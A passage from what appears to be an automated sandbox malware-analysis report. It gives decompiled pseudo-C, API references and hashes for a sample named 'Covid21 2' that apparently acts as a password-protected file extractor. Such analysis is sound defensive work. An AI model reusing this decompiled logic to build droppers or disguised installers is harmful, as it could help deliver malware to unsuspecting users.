(( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4);
										_t40 =  &(_t47[2]);
										_t100 = _t100 - 8;
										_t109 = _t109 - 1;
										_t103 = _t94 >> 0x00000008 ^  *(0x4090e8 + ((_t47[1] & 0x000000ff ^ _t94) & 0x000000ff) * 4);
									} while (_t109 != 0);
									_t50 =  *(_t110 + 0x10);
									_t106 =  *(_t110 + 0x14);
								}
								if(_t100 != 0) {
									do {
										_t103 = _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4);
										_t40 = _t40 + 1;
										_t100 = _t100 - 1;
									} while (_t100 != 0);
								}
							} while (_t97 == 0x1000);
							_t98 =  *0x40b13c; // 0x27d0000
							HeapFree(_t98, 0, _t106);
						}
						FindCloseChangeNotification(_t50); // executed
					}
				}
				return  !_t103;
			}























                                  0x00406960
                                  0x00406968
                                  0x0040696d
                                  0x00406987
                                  0x0040698d
                                  0x00406992
                                  0x00406996
                                  0x0040699c
                                  0x004069b0
                                  0x004069b4
                                  0x004069b8
                                  0x004069c0
                                  0x004069ce
                                  0x004069d4
                                  0x004069db
                                  0x004069dd
                                  0x004069df
                                  0x004069e7
                                  0x004069f0
                                  0x004069fb
                                  0x00406a2b
                                  0x00406a3e
                                  0x00406a57
                                  0x00406a70
                                  0x00406a87
                                  0x00406a95
                                  0x00406ab5
                                  0x00406ab8
                                  0x00406abb
                                  0x00406abe
                                  0x00406abe
                                  0x00406ac6
                                  0x00406aca
                                  0x00406aca
                                  0x00406ad0
                                  0x00406ad2
                                  0x00406ae0
                                  0x00406ae7
                                  0x00406aea
                                  0x00406aea
                                  0x00406ad2
                                  0x00406aef
                                  0x00406afb
                                  0x00406b05
                                  0x00406b0b
                                  0x00406b0d
                                  0x00406b13
                                  0x00406b14
                                  0x00406b1d

                                  APIs
                                  • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000), ref: 00406987
                                  • RtlAllocateHeap.NTDLL(027D0000,00000000,00001000), ref: 004069AA
                                  • ReadFile.KERNELBASE(00000000,00000000,00001000,?,00000000,?,?,00000000,00000000), ref: 004069CE
                                  • HeapFree.KERNEL32(027D0000,00000000,00000000,?,?,00000000,00000000), ref: 00406B05
                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,00000000), ref: 00406B0D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: FileHeap$AllocateChangeCloseCreateFindFreeNotificationRead
                                  • String ID:
                                  • API String ID: 3835257504-0
                                  • Opcode ID: 3652f549abcd2857d86857aab28a77ee2e5e896dfda86d6c962bdceb55ecb8e0
                                  • Instruction ID: ff62adfd02c82ff6d2fb6992739edd60424dd107fe33d02030225fc65b1a4817
                                  • Opcode Fuzzy Hash: 3652f549abcd2857d86857aab28a77ee2e5e896dfda86d6c962bdceb55ecb8e0
                                  • Instruction Fuzzy Hash: D9417A326403910BD3149F74EDDAB773760EB46301F09823AEB82A62D2D67D9514DB18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403B70, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 100%
                                  			E00403B70(_Unknown_base(*)()* _a4) {
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;

				 *0x40b214 = _a4;
				_a4 = E00403B30;
				_t3 =  &_a4; // 0x403b30
				_t6 =  *_t3;
				if(_t6 == 0) {
					_t7 =  *0x40b218; // 0x0
					_t8 = SetUnhandledExceptionFilter(_t7);
					 *0x40b218 = 0;
					return _t8;
				} else {
					if( *0x40b218 != 0) {
						_a4 = _t6;
						goto ( *0x40a728);
					}
					_t9 = SetUnhandledExceptionFilter(_t6); // executed
					 *0x40b218 = _t9;
					return _t9;
				}
			}







                                  0x00403b74
                                  0x00403b79
                                  0x00403b90
                                  0x00403b90
                                  0x00403b96
                                  0x00403bba
                                  0x00403bc0
                                  0x00403bc6
                                  0x00403bd0
                                  0x00403b98
                                  0x00403b9f
                                  0x00403ba1
                                  0x00403ba5
                                  0x00403ba5
                                  0x00403bac
                                  0x00403bb2
                                  0x00403bb7
                                  0x00403bb7

                                  APIs
                                  • SetUnhandledExceptionFilter.KERNELBASE(0;@,00401302,00000000), ref: 00403BAC
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,00401302,00000000), ref: 00403BC0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID: 0;@$0;@
                                  • API String ID: 3192549508-1108649562
                                  • Opcode ID: 64c2b6b9c31235df9d05b2dba24abafc85a962d7f965a94dd5b50041edd19de7
                                  • Instruction ID: 03ed1251e5b82d0a9b1dd8357dd2ea466bfd254288420da3d75d37e4e8d64f8a
                                  • Opcode Fuzzy Hash: 64c2b6b9c31235df9d05b2dba24abafc85a962d7f965a94dd5b50041edd19de7
                                  • Instruction Fuzzy Hash: 2EF0A5B0545300DBC700DF94DA8C60A7BF8EBA875AF00887EA005A7361C778DA90DB9E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401000, Relevance: 74.2, APIs: 16, Strings: 26, Instructions: 666memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 401000-401124 memset GetModuleHandleA HeapCreate call 403000 call 407470 call 406807 call 406040 call 404ab3 call 4040e0 call 403d90 call 40393b call 403694 call 403ef0 call 403060 call 4030a0 call 403dc0 GetUserDefaultLangID VerLanguageNameA CharLowerA call 403de0 call 4030f0 call 403e30 call 4074c0 35 40112a-4011fa call 403108 * 13 0->35 36 4011ff-4012ca call 403108 * 13 0->36 88 4012cf-4012d9 call 403cd7 35->88 36->88 91 4012f6-401323 call 403b70 call 403a66 GetModuleHandleA 88->91 92 4012db-401bb6 call 4036a2 88->92 101 4013a1-4013b3 call 4020c9 91->101 102 401325 91->102 99 401bbb-401bcb ExitProcess HeapDestroy ExitProcess 92->99 108 4013b5-4013fe call 401bf4 call 4020c9 101->108 109 4013cc-4013e7 call 4036a2 101->109 103 40132f-40133c 102->103 103->101 105 40133e-40139f call 403a18 call 4030f0 call 4074f0 * 3 call 4030f0 103->105 105->103 122 401400-401458 call 403de0 call 4030f0 call 4020c9 108->122 123 401426-401441 call 4036a2 108->123 109->99 140 40147a-401495 call 4036a2 122->140 141 40145a-4014ac call 4020c9 122->141 123->99 140->99 147 4014cc-4014de call 4020c9 141->147 148 4014ae-4014c7 141->148 151 4014e0-4014f9 147->151 152 4014fe-401510 call 4020c9 147->152 148->147 151->152 155 401516-4015c7 call 404de6 call 4042bd call 4043ae call 4045b3 call 404e09 call 4045d3 152->155 156 40176d-4017c7 call 403de0 call 4030f0 call 403de0 call 4030f0 call 4020c9 152->156 182 4015cc-4015da call 40505e 155->182 177 401a3c-401a80 call 4074f0 * 3 call 4030f0 call 406170 156->177 178 4017cd-401815 call 403a18 call 403de0 call 4074c0 156->178 224 401a82-401ae9 call 406250 call 405fd0 call 4074c0 177->224 225 401a9e-401ad7 call 405ea0 call 40203d call 4036a2 _rmdir 177->225 203 401817-401820 178->203 204 401829 178->204 191 4015f9-401601 182->191 192 4015dc-4015ef _rmdir 182->192 195 401642-40164a 191->195 196 401603-401611 call 405066 191->196 192->99 199 401689-40168a 195->199 200 40164c-40165a call 405074 195->200 208 401613-40163d call 4045fc call 4030f0 call 404925 196->208 209 40163f-401640 196->209 199->182 215 401688 200->215 216 40165c-401686 call 4045fc call 4030f0 call 404925 200->216 203->204 210 401822-401827 203->210 212 40182b-40182d 204->212 245 40168f-4016e4 call 4031f0 call 406860 call 403de0 call 4074c0 208->245 209->199 210->212 212->177 217 401833-40187a call 405dd5 call 4036f8 call 4030f0 call 4074c0 212->217 215->199 216->245 256 401880-4018aa call 4074f0 call 4030f0 call 4074c0 217->256 257 4019dd-401a37 call 403a79 call 405e15 call 405e90 _rmdir 217->257 259 401af6-401ba9 call 4074f0 * 2 call 402779 call 40203d call 405ea0 call 403a79 call 405e15 call 405e90 _rmdir 224->259 260 401aeb-401af1 call 402130 224->260 225->99 281 401714-401726 call 4020c9 245->281 282 4016e6-40170f call 4036a2 _rmdir 245->282 289 4018b7-4018c9 call 406230 256->289 290 4018ac-4018b2 call 402130 256->290 257->99 259->99 260->259 297 401732-401768 call 401d57 281->297 298 401728-40172d 281->298 282->99 300 4019af-4019c1 call 406170 289->300 301 4018cf-40194e call 405fd0 call 4074f0 * 5 call 4036a2 289->301 290->289 297->156 298->297 300->257 312 4019c3-4019d8 call 406250 call 405fd0 300->312 301->300 331 401950-4019aa call 403a79 call 405e15 call 405e90 _rmdir 301->331 312->257 331->99
                                  C-Code - Quality: 80%
                                  			E00401000(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v44;
				intOrPtr _v52;
				void _t9;
				intOrPtr _t28;
				CHAR* _t62;
				intOrPtr* _t64;
				intOrPtr _t67;
				intOrPtr* _t70;
				CHAR* _t73;
				intOrPtr _t74;
				CHAR* _t75;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t82;
				intOrPtr _t85;
				intOrPtr* _t88;
				intOrPtr* _t94;
				intOrPtr _t108;
				void* _t110;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr* _t118;
				intOrPtr _t120;
				intOrPtr _t121;
				intOrPtr _t126;
				intOrPtr _t127;
				void* _t129;
				intOrPtr _t146;
				intOrPtr _t147;
				intOrPtr _t148;
				void* _t150;
				intOrPtr _t163;
				intOrPtr _t167;
				void* _t168;
				intOrPtr _t169;
				intOrPtr _t171;
				intOrPtr _t174;
				CHAR* _t177;
				intOrPtr _t181;
				CHAR* _t185;
				intOrPtr _t186;
				CHAR* _t187;
				CHAR* _t188;
				intOrPtr _t189;
				CHAR* _t190;
				intOrPtr _t191;
				intOrPtr* _t213;
				intOrPtr _t215;
				intOrPtr _t216;
				intOrPtr _t222;
				void* _t224;
				void* _t226;
				intOrPtr _t242;
				intOrPtr _t247;
				void* _t262;
				intOrPtr _t263;
				void* _t264;
				void* _t279;
				void* _t280;
				void* _t281;
				intOrPtr _t282;
				intOrPtr _t284;
				void* _t285;
				intOrPtr _t286;
				intOrPtr _t287;
				intOrPtr _t288;
				intOrPtr _t289;
				intOrPtr _t290;
				intOrPtr _t291;
				void* _t292;
				intOrPtr _t294;
				void* _t295;
				intOrPtr _t296;
				intOrPtr _t297;
				intOrPtr _t298;
				intOrPtr _t299;
				void* _t300;
				intOrPtr _t301;
				intOrPtr _t302;
				intOrPtr _t304;
				intOrPtr _t306;
				intOrPtr _t307;
				intOrPtr _t308;
				intOrPtr _t309;
				void* _t310;
				void* _t311;
				void* _t313;
				void* _t314;
				intOrPtr _t315;
				intOrPtr _t316;
				void* _t318;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr* _t335;
				void* _t342;

				_t342 = __eflags;
				_t333 = __esi;
				_t332 = __edi;
				_t262 = __edx;
				_t224 = __ecx;
				memset(0x40b13c, 0, 0xc8);
				_t335 = _t334 + 0xc;
				 *0x40b140 = GetModuleHandleA(0);
				_t9 = HeapCreate(0, 0x1000, 0); // executed
				 *0x40b13c = _t9;
				E00403000(_t262); // executed
				E00407470(); // executed
				E00406807();
				E00406040();
				E00404AB3(); // executed
				E004040E0(_t224); // executed
				E00403D90();
				E0040393B();
				E00403694();
				_push(7);
				_push(0x40a384);
				 *0x40b1fc = E00403EF0(8, 0x40b200);
				_push(7);
				_push(0x40b1f4);
				_t263 =  *0x40b1f4; // 0x27d12d0
				E00403060(_t20, _t263);
				E004030A0(0x401, 8, 0x40a37c);
				 *0x40b174 = E00403DC0(0x400);
				VerLanguageNameA(GetUserDefaultLangID(),  *0x40b174, 8); // executed
				CharLowerA( *0x40b174);
				_t28 =  *0x40b3f8; // 0x0
				_push(_t28);
				E00403DE0( *0x40b174, 8);
				_t264 = _t28;
				E004030F0(0x40b178, _t264);
				E00403E30( *0x40b174);
				_push( *0x40b178);
				_pop(_t226);
				E004074C0(_t226, "deutsch");
				if(_t342 == 0) {
					E00403108(0x40b17c, "Continue?");
					E00403108(0x40b180, "Error!");
					E00403108(0x40b184, "Can not create some of your include files.");
					E00403108(0x40b188, "Can not allocate the memory.");
					E00403108(0x40b18c, "Wrong password.");
					E00403108(0x40b190, "Overwrite?");
					E00403108(0x40b194, "The file ");
					E00403108(0x40b198, " already exists in the current directory. Overwrite?");
					E00403108(0x40b19c, "An unknown error occured. The program will be terminated.");
					E00403108(0x40b1a0, "This program is not supported on this operating system.");
					E00403108(0x40b1a4, "Choose a location to save the files.");
					E00403108(0x40b1a8, "Password");
					_t239 = 0x40b1ac;
					E00403108(0x40b1ac, "Please enter the password.");
				} else {
					E00403108(0x40b17c, "Fortfahren?");
					E00403108(0x40b180, "Fehler!");
					E00403108(0x40b184, "Einige Include Dateien konnten nicht erstellt werden.");
					E00403108(0x40b188, 0x40a174);
					E00403108(0x40b18c, "Falsches Passwort.");
					E00403108(0x40b190, 0x40a10f);
					E00403108(0x40b194, "Die Datei ");
					E00403108(0x40b198, 0x40a24a);
					E00403108(0x40b19c, "Ein unbekannter Fehler ist aufgetreten. Das Programm wird beendet.");
					E00403108(0x40b1a0, 0x40a290);
					E00403108(0x40b1a4, 0x40a03a);
					E00403108(0x40b1a8, "Passwort");
					_t239 = 0x40b1ac;
					E00403108(0x40b1ac, "Bitte geben Sie das Passwort ein.");
				}
				if(E00403CD7() >= 0x32) {
					E00403B70(E004020A6);
					 *0x40b1b4 = E00403A66(_t239);
					 *0x40b1b8 = GetModuleHandleA(0);
					_t213 =  *0x40b1b4; // 0x0
					__eflags = _t213;
					if(_t213 > 0) {
						 *0x40b1bc = 0;
						while(1) {
							_t222 =  *0x40b1b4; // 0x0
							__eflags = _t222 - 1 -  *0x40b1bc; // 0x0
							if(__eflags < 0) {
								goto L9;
							}
							_t191 =  *0x40b3f8; // 0x0
							E00403A18(_t239,  *0x40b1bc, _t191);
							_t314 = _t191;
							E004030F0(0x40b1c0, _t314);
							_push( *0x40b1c0);
							L00408011();
							_t315 =  *0x40b1c4; // 0x0
							_push( *0x40b3f8);
							E004074F0(_t315);
							_t316 =  *0x40b1c0; // 0x0
							E004074F0(_t316);
							E004074F0(0x40a00e);
							_t239 = 0x40b1c4;
							_pop(_t318);
							E004030F0(0x40b1c4, _t318);
							 *0x40b1bc =  &(( *0x40b1bc)[1]);
						}
					}
					L9:
					__eflags = E004020C9( *0x40b1b8, "OPS");
					if(__eflags == 0) {
						_push(0x10);
						E004036A2( *0x40b180,  *0x40b19c);
						_push(1);
					} else {
						_t62 =  *0x40b174; // 0x43e018
						 *0x40b1c8 = _t62;
						E00401BF4(__eflags,  *0x40b1c8);
						_t64 = E004020C9( *0x40b1b8, "NOPS");
						__eflags = _t64;
						if(_t64 == 0) {
							_push(0x10);
							E004036A2( *0x40b180,  *0x40b19c);
							_push(1);
						} else {
							_t67 =  *0x40b3f8; // 0x0
							_push(_t67);
							E00403DE0( *0x40b174,  *0x40b1b0);
							_t239 = 0x40b1cc;
							_t279 = _t67;
							E004030F0(0x40b1cc, _t279);
							_t70 = E004020C9( *0x40b1b8, "BDFINOPS");
							__eflags = _t70;
							if(_t70 == 0) {
								_push(0x10);
								E004036A2( *0x40b180,  *0x40b19c);
								_push(1);
							} else {
								_t73 =  *0x40b174; // 0x43e018
								 *0x40b1d0 = _t73;
								_t74 =  *0x40b1b0; // 0x25a4cf
								 *0x40b154 = _t74;
								_t75 =  *0x40b1d0; // 0x43da74
								 *0x40b148 = _t75;
								_t76 = E004020C9( *0x40b1b8, "INOPS");
								__eflags = _t76;
								if(_t76 != 0) {
									_t188 =  *0x40b174; // 0x43e018
									 *0x40b1d4 = _t188;
									_t189 =  *0x40b1b0; // 0x25a4cf
									 *0x40b158 = _t189;
									_t190 =  *0x40b1d4; // 0x6984e8
									 *0x40b14c = _t190;
								}
								_t78 = E004020C9( *0x40b1b8, "FINOPS");
								__eflags = _t78;
								if(_t78 != 0) {
									_t185 =  *0x40b174; // 0x43e018
									 *0x40b1d8 = _t185;
									_t186 =  *0x40b1b0; // 0x25a4cf
									 *0x40b15c = _t186;
									_t187 =  *0x40b1d8; // 0x43e018
									 *0x40b150 = _t187;
								}
								_t80 = E004020C9( *0x40b1b8, 0x40a0c7);
								__eflags = _t80;
								if(_t80 == 0) {
									L40:
									_t82 =  *0x40b3f8; // 0x0
									_push(_t82);
									E00403DE0( *0x40b148,  *0x40b154);
									_t280 = _t82;
									E004030F0(0x40b1e4, _t280);
									_t85 =  *0x40b3f8; // 0x0
									_push(_t85);
									E00403DE0( *0x40b14c,  *0x40b158);
									_t281 = _t85;
									E004030F0(0x40b1e8, _t281);
									_t88 = E004020C9( *0x40b1b8, "DFINOPS");
									__eflags = _t88;
									if(_t88 == 0) {
										L55:
										_t282 =  *0x40b170; // 0x29a4838
										_push( *0x40b3f8);
										E004074F0(_t282);
										E004074F0(0x40a0b9);
										_t284 =  *0x40b1cc; // 0x29a4f30
										E004074F0(_t284);
										_t239 = 0x40b1cc;
										_pop(_t285);
										E004030F0(0x40b1cc, _t285);
										_push( *0x40b1cc);
										_t94 = E00406170(__eflags, 1);
										__eflags = _t94;
										if(_t94 == 0) {
											E00405EA0( *0x40b1cc);
											E0040203D();
											_push(0x10);
											E004036A2( *0x40b180,  *0x40b19c);
											_push( *0x40b170);
											L00403196();
											_push(1);
										} else {
											E00406250(_t332, 1,  *0x40b1e4);
											E00405FD0(1);
											_t286 =  *0x40b1e8; // 0x29a4e60
											_t239 = 0;
											__eflags = 0;
											E004074C0(0, _t286);
											if(__eflags == 0) {
												_push( *0x40b1e8);
												E00402130();
											}
											_push( *0x40b3f8);
											_t287 =  *0x40b1c4; // 0x0
											_push( *0x40b3f8);
											E004074F0(_t287);
											_t288 =  *0x40b16c; // 0x0
											E004074F0(_t288);
											 *0x40b3f8 =  *0x40b3f8 + 1;
											_push( *0x40b168);
											_push( *0x40b1cc);
											_t289 =  *0x40a38c; // 0x29a06f0
											_v44 = _v44 + _t289;
											E00402779();
											_pop( *0x40b3f8);
											E0040203D();
											E00405EA0( *0x40b1cc); // executed
											_push( *0x40b3f8);
											_t108 =  *0x40b3f8; // 0x0
											E00403A79(__eflags,  *0x40b3f8);
											 *0x40b3f8 =  *0x40b3f8 + 1;
											_t290 =  *0x40a38c; // 0x29a06f0
											 *_t335 =  *_t335 + _t290;
											_t110 = E00405E15(_t108, _t108);
											 *0x40b3f8 =  *0x40b3f8 + 1;
											_t291 =  *0x40a38c; // 0x29a06f0
											 *_t335 =  *_t335 + _t291; // executed
											E00405E90(_t110,  *0x40b3f8); // executed
											_pop( *0x40b3f8);
											_push( *0x40b170); // executed
											L00403196(); // executed
											_push(0);
										}
									} else {
										_t113 =  *0x40b3f8; // 0x0
										_push(_t113);
										E00403A18(0x40b1e8, 0, _t113);
										 *0x40b3f8 =  *0x40b3f8 + 1;
										_t115 =  *0x40b3f8; // 0x0
										E00403DE0( *0x40b174,  *0x40b1b0);
										_t292 = _t115;
										_t242 = _t115;
										 *0x40b3f8 = _t242;
										_t243 = _t242 +  *0x40a38c;
										__eflags = _t292 +  *0x40a38c;
										E004074C0(_t242 +  *0x40a38c, _t292 +  *0x40a38c);
										if(__eflags == 0) {
											L44:
											_t118 = 0;
											__eflags = 0;
										} else {
											_t216 =  *0x40b1b4; // 0x0
											__eflags = _t216 - 1;
											if(_t216 != 1) {
												goto L44;
											} else {
												_t118 = 1;
											}
										}
										__eflags = _t118;
										if(__eflags == 0) {
											goto L55;
										} else {
											_t120 =  *0x40b3f8; // 0x0
											_t121 =  *0x40b3f8; // 0x0
											E00405DD5(__eflags, _t121);
											 *0x40b3f8 =  *0x40b3f8 + 1;
											_t294 =  *0x40a38c; // 0x29a06f0
											_v52 = _v52 + _t294;
											E004036F8(_t243, _t333,  *0x40b1a4, _t121, _t120);
											_t295 = _t120;
											E004030F0(0x40b1ec, _t295);
											_t296 =  *0x40b1ec; // 0x0
											_t239 = 0;
											__eflags = 0;
											E004074C0(0, _t296);
											if(__eflags != 0) {
												L54:
												_t126 =  *0x40b3f8; // 0x0
												_t127 =  *0x40b3f8; // 0x0
												E00403A79(__eflags,  *0x40b3f8);
												 *0x40b3f8 =  *0x40b3f8 + 1;
												_t297 =  *0x40a38c; // 0x29a06f0
												 *_t335 =  *_t335 + _t297;
												_t129 = E00405E15(_t127, _t127);
												 *0x40b3f8 =  *0x40b3f8 + 1;
												_t298 =  *0x40a38c; // 0x29a06f0
												 *_t335 =  *_t335 + _t298;
												E00405E90(_t129, _t126);
												 *0x40b3f8 = _t126;
												_push( *0x40b170);
												L00403196();
												_push(0);
											} else {
												_t299 =  *0x40b1ec; // 0x0
												_push( *0x40b3f8);
												E004074F0(_t299);
												_pop(_t300);
												E004030F0(0x40b168, _t300);
												_t301 =  *0x40b1e8; // 0x29a4e60
												_t239 = 0;
												__eflags = 0;
												E004074C0(0, _t301);
												if(__eflags == 0) {
													_push( *0x40b1e8);
													E00402130();
												}
												__eflags = E00406230(1,  *0x40b1cc);
												if(__eflags == 0) {
													L52:
													_push( *0x40b1cc);
													__eflags = E00406170(__eflags, 1);
													if(__eflags != 0) {
														E00406250(_t332, 1,  *0x40b1e4);
														E00405FD0(1);
													}
													goto L54;
												} else {
													E00405FD0(1);
													_push( *0x40b3f8);
													_t302 =  *0x40b194; // 0x29a0588
													E004074F0(_t302);
													E004074F0(0x40a010);
													_t304 =  *0x40b1cc; // 0x29a4f30
													E004074F0(_t304);
													E004074F0(0x40a010);
													_t306 =  *0x40b198; // 0x29a05a0
													E004074F0(_t306);
													 *0x40b3f8 =  *0x40b3f8 + 1;
													_t307 =  *0x40a38c; // 0x29a06f0
													_v52 = _v52 + _t307;
													_t146 = E004036A2( *0x40b190,  *0x40b3f8);
													 *0x40b3f8 = 0x24;
													 *0x40b1f0 = _t146;
													_t215 =  *0x40b1f0; // 0x0
													__eflags = _t215 - 7;
													if(__eflags != 0) {
														goto L52;
													} else {
														_t147 =  *0x40b3f8; // 0x0
														_t148 =  *0x40b3f8; // 0x0
														E00403A79(__eflags,  *0x40b3f8);
														 *0x40b3f8 =  *0x40b3f8 + 1;
														_t308 =  *0x40a38c; // 0x29a06f0
														 *_t335 =  *_t335 + _t308;
														_t150 = E00405E15(_t148, _t148);
														 *0x40b3f8 =  *0x40b3f8 + 1;
														_t309 =  *0x40a38c; // 0x29a06f0
														 *_t335 =  *_t335 + _t309;
														E00405E90(_t150, _t147);
														 *0x40b3f8 = _t147;
														_push( *0x40b170);
														L00403196();
														_push(0);
													}
												}
											}
										}
									}
								} else {
									E00404DE6(0, 0, 0, 0xc8, 0x6e,  *0x40b1a8, 0xc80001);
									E004042BD(1, 0x15, 0xf, 0x9e, 0x14,  *0x40b1ac);
									E004043AE(2, 0x15, 0x28, 0x9e, 0x14, 0x40a00d, 0x20);
									E004045B3(3, 0x3d, 0x4b, 0x4e, 0x14, "OK");
									E00404E09(_t239, __eflags, 0, 0xd, 4);
									E004045D3(2);
									while(1) {
										_push(E0040505E());
										__eflags = 0x10 -  *_t335;
										if(0x10 ==  *_t335) {
											break;
										}
										__eflags = 0x332d -  *_t335;
										if(0x332d !=  *_t335) {
											__eflags = 0x332c -  *_t335;
											if(0x332c !=  *_t335) {
												goto L34;
											} else {
												_push(E00405074());
												__eflags = 3 -  *_t335;
												if(__eflags != 0) {
													goto L34;
												} else {
													_t163 =  *0x40b3f8; // 0x0
													E004045FC(__eflags, 2, _t163);
													_t310 = _t163;
													E004030F0(0x40b1dc, _t310);
													E00404925(_t332, __eflags, 0);
													_t335 = _t335 + 8;
													goto L35;
												}
											}
										} else {
											_push(E00405066());
											__eflags = 4 -  *_t335;
											if(__eflags != 0) {
												L34:
												continue;
											} else {
												_t181 =  *0x40b3f8; // 0x0
												E004045FC(__eflags, 2, _t181);
												_t313 = _t181;
												E004030F0(0x40b1dc, _t313);
												E00404925(_t332, __eflags, 0);
												_t335 = _t335 + 8;
												L35:
												_t167 =  *0x40b3f8; // 0x0
												_push(_t167);
												_t168 = E004031F0( *0x40b1dc);
												_t169 =  *0x40b1dc; // 0x0
												E00406860(__eflags, _t169, _t168, _t167);
												 *0x40b3f8 =  *0x40b3f8 + 1;
												_t171 =  *0x40b3f8; // 0x0
												E00403DE0( *0x40b174,  *0x40b1b0);
												_t311 = _t171;
												_t247 = _t171;
												 *0x40b3f8 = _t247;
												_t239 = _t247 +  *0x40a38c;
												__eflags = _t311 +  *0x40a38c;
												E004074C0(_t247 +  *0x40a38c, _t311 +  *0x40a38c);
												if(__eflags != 0) {
													_t174 = E004020C9( *0x40b1b8, 0x40a0c9);
													__eflags = _t174;
													if(_t174 != 0) {
														_t177 =  *0x40b174; // 0x43e018
														 *0x40b1e0 = _t177;
													}
													_push( *0x40b15c);
													_push( *0x40b158);
													_push( *0x40b154);
													_push( *0x40b1e0);
													_push( *0x40b1d8);
													_push( *0x40b1d4);
													_push( *0x40b1d0);
													_push( *0x40b1dc);
													_push( *0x40b1b8);
													E00401D57();
													goto L40;
												} else {
													_push(0x10);
													E004036A2( *0x40b180,  *0x40b18c);
													_push( *0x40b170);
													L00403196();
													_push(1);
												}
											}
										}
										goto L62;
									}
									_push( *0x40b170);
									L00403196();
									_push(0);
								}
							}
						}
					}
				} else {
					_push(0x10);
					E004036A2( *0x40b180,  *0x40b1a0);
					_push(0);
				}
				L62:
				ExitProcess();
				HeapDestroy( *0x40b13c); // executed
				ExitProcess(??); // executed
				E00403B0B();
				E00403DB0(E00403CC0());
				E00404150();
				E00404A13(_t239);
				return E0040681C(E00406030());
			}




































































































                                  0x00401000
                                  0x00401000
                                  0x00401000
                                  0x00401000
                                  0x00401000
                                  0x0040100f
                                  0x00401014
                                  0x00401021
                                  0x00401035
                                  0x0040103a
                                  0x0040103f
                                  0x00401044
                                  0x00401049
                                  0x0040104e
                                  0x00401053
                                  0x00401058
                                  0x0040105d
                                  0x00401062
                                  0x00401067
                                  0x0040106c
                                  0x00401071
                                  0x00401087
                                  0x0040108c
                                  0x00401091
                                  0x0040109b
                                  0x004010a1
                                  0x004010b0
                                  0x004010bf
                                  0x004010d5
                                  0x004010e0
                                  0x004010e5
                                  0x004010ea
                                  0x004010f7
                                  0x00401102
                                  0x00401103
                                  0x0040110e
                                  0x00401113
                                  0x0040111e
                                  0x0040111f
                                  0x00401124
                                  0x0040120a
                                  0x0040121a
                                  0x0040122a
                                  0x0040123a
                                  0x0040124a
                                  0x0040125a
                                  0x0040126a
                                  0x0040127a
                                  0x0040128a
                                  0x0040129a
                                  0x004012aa
                                  0x004012ba
                                  0x004012c4
                                  0x004012ca
                                  0x0040112a
                                  0x00401135
                                  0x00401145
                                  0x00401155
                                  0x00401165
                                  0x00401175
                                  0x00401185
                                  0x00401195
                                  0x004011a5
                                  0x004011b5
                                  0x004011c5
                                  0x004011d5
                                  0x004011e5
                                  0x004011ef
                                  0x004011f5
                                  0x004011f5
                                  0x004012d9
                                  0x004012fd
                                  0x00401307
                                  0x00401316
                                  0x0040131b
                                  0x00401321
                                  0x00401323
                                  0x00401325
                                  0x0040132f
                                  0x0040132f
                                  0x00401336
                                  0x0040133c
                                  0x00000000
                                  0x00000000
                                  0x0040133e
                                  0x0040134b
                                  0x00401356
                                  0x00401357
                                  0x0040135c
                                  0x00401362
                                  0x00401367
                                  0x0040136d
                                  0x00401373
                                  0x00401378
                                  0x0040137e
                                  0x00401388
                                  0x0040138d
                                  0x00401393
                                  0x00401394
                                  0x00401399
                                  0x00401399
                                  0x0040132f
                                  0x004013a1
                                  0x004013b1
                                  0x004013b3
                                  0x004013cc
                                  0x004013dd
                                  0x004013e2
                                  0x004013b5
                                  0x004013b5
                                  0x004013ba
                                  0x004013c5
                                  0x004013f7
                                  0x004013fc
                                  0x004013fe
                                  0x00401426
                                  0x00401437
                                  0x0040143c
